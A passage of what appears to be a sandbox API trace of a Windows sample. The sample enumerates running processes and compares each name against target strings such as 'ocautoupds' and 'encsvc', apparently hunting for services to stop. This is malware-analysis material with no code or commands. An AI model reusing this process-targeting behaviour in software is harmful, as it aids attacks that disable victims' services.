lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.526] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571ba0 [0094.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571ba0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.526] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0094.526] StrStrIA (lpFirst="dllhost.exe", lpSrch="ocautoupds") returned 0x0 [0094.526] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.527] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571d20 [0094.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3571d20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.527] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.527] StrStrIA (lpFirst="taskhostw.exe", lpSrch="ocautoupds") returned 0x0 [0094.527] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0094.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.528] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571d50 [0094.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3571d50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0094.529] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0094.529] StrStrIA (lpFirst="UsoClient.exe", lpSrch="ocautoupds") returned 0x0 [0094.529] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.532] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3571fc0 [0094.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3571fc0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.532] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.532] StrStrIA (lpFirst="taskhostw.exe", lpSrch="ocautoupds") returned 0x0 [0094.532] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0094.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0094.534] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x356d048 [0094.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x356d048, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0094.534] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0094.534] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="ocautoupds") returned 0x0 [0094.534] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0094.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.535] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356d068 [0094.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x356d068, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0094.535] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0094.535] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="ocautoupds") returned 0x0 [0094.535] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0094.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0094.536] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356a790 [0094.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356a790, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0094.536] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0094.536] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="ocautoupds") returned 0x0 [0094.537] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.538] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571e28 [0094.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571e28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.538] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0094.538] StrStrIA (lpFirst="conhost.exe", lpSrch="ocautoupds") returned 0x0 [0094.538] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.539] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571e40 [0094.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3571e40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.539] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0094.539] StrStrIA (lpFirst="conhost.exe", lpSrch="ocautoupds") returned 0x0 [0094.539] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.541] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571d98 [0094.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571d98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.541] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.541] StrStrIA (lpFirst="svchost.exe", lpSrch="ocautoupds") returned 0x0 [0094.541] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0094.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.542] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3571f60 [0094.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3571f60, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0094.542] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0094.542] StrStrIA (lpFirst="rxodge.exe", lpSrch="ocautoupds") returned 0x0 [0094.542] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0094.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.543] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3572038 [0094.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3572038, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0094.544] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0094.544] StrStrIA (lpFirst="sppsvc.exe", lpSrch="ocautoupds") returned 0x0 [0094.544] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0094.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.545] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x356d1a8 [0094.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x356d1a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0094.545] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0094.545] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="ocautoupds") returned 0x0 [0094.545] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 0 [0094.546] CloseHandle (hObject=0x350) returned 1 [0094.546] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0094.560] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0094.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.561] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x356d088 [0094.561] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x356d088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0094.561] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0094.561] StrStrIA (lpFirst="[System Process]", lpSrch="encsvc") returned 0x0 [0094.561] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0094.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0094.562] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3547a18 [0094.562] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3547a18, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0094.562] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0094.562] StrStrIA (lpFirst="System", lpSrch="encsvc") returned 0x0 [0094.562] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0094.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.563] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3571eb8 [0094.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3571eb8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0094.563] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0094.563] StrStrIA (lpFirst="smss.exe", lpSrch="encsvc") returned 0x0 [0094.563] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.564] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571d80 [0094.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3571d80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0094.564] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0094.564] StrStrIA (lpFirst="csrss.exe", lpSrch="encsvc") returned 0x0 [0094.564] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0094.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.585] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571f30 [0094.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3571f30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0094.585] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0094.585] StrStrIA (lpFirst="wininit.exe", lpSrch="encsvc") returned 0x0 [0094.585] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0094.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.586] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571ed0 [0094.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3571ed0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0094.586] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0094.586] StrStrIA (lpFirst="csrss.exe", lpSrch="encsvc") returned 0x0 [0094.586] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0094.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.587] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571e58 [0094.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3571e58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0094.587] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0094.587] StrStrIA (lpFirst="winlogon.exe", lpSrch="encsvc") returned 0x0 [0094.587] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0094.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.588] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3571e70 [0094.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3571e70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0094.588] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0094.588] StrStrIA (lpFirst="services.exe", lpSrch="encsvc") returned 0x0 [0094.588] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0094.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.589] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3571e88 [0094.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3571e88, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0094.589] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0094.589] StrStrIA (lpFirst="lsass.exe", lpSrch="encsvc") returned 0x0 [0094.589] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.590] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3571ea0 [0094.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3571ea0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.590] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.591] 